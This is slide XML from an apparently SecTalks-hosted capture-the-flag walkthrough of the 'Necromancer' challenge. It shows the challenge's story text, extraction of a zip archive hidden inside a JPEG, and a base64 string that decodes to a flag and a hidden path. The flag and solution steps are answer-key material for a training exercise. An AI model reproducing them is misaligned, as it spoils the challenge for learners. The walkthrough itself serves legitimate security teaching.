              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of light </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>beam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>its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surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>birds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get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closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> up at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crows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you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can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see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they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are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a formation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Squinting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your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eyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the light </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you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can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see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the formation looks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>numeral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>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quickly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>birds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appeared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>left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you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once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>again</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tortured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deafening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sound of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>silence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>666 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>closed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU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88837860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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU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2" name="Picture 1" descr="Screen Shot 2016-12-15 at 1.22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50" y="1749326"/>
            <a:ext cx="5969925" cy="46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788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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200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unzip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pileoffeathers.jpg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Archive:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pileoffeathers.jpg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warning [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pileoffeathers.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]:  36994 extra bytes at beginning or within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zipfile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(attempting to process anyway)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inflating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feathers.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
          </a:p>
          <a:p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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feathers.txt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ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==</a:t>
            </a:r>
          </a:p>
          <a:p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:~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ 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b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0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More Base64 to decode…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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flag3{9ad3f62db7b91c28b68137000394639f} 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Cross the chasm at /</a:t>
            </a:r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amagicbridgeappearsatthechasm</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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398847554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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Necromancer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Walkthrough - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="44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PER0x25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6118" y="48063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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="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AU" b="0" i="0" u="none" strike="noStrike" cap="none" baseline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2" name="Picture 1" descr="Screen Shot 2016-12-15 at 1.27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84" y="1571953"/>
            <a:ext cx="4997459" cy="49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6986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1999</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>307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Welcome!</vt:lpstr>
      <vt:lpstr>SecTalks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Necromancer Walkthrough - PER0x25</vt:lpstr>
      <vt:lpstr>Speakers PER0x25</vt:lpstr>
      <vt:lpstr>SecTalks PER0x25</vt:lpstr>
      <vt:lpstr>B33rz &amp; Nomz</vt:lpstr>
      <vt:lpstr>Stay in touch </vt:lpstr>
      <vt:lpstr>Without further ado...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NLH</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-15T06:28:36Z</dcterms:modified>
</cp:coreProperties>
</file>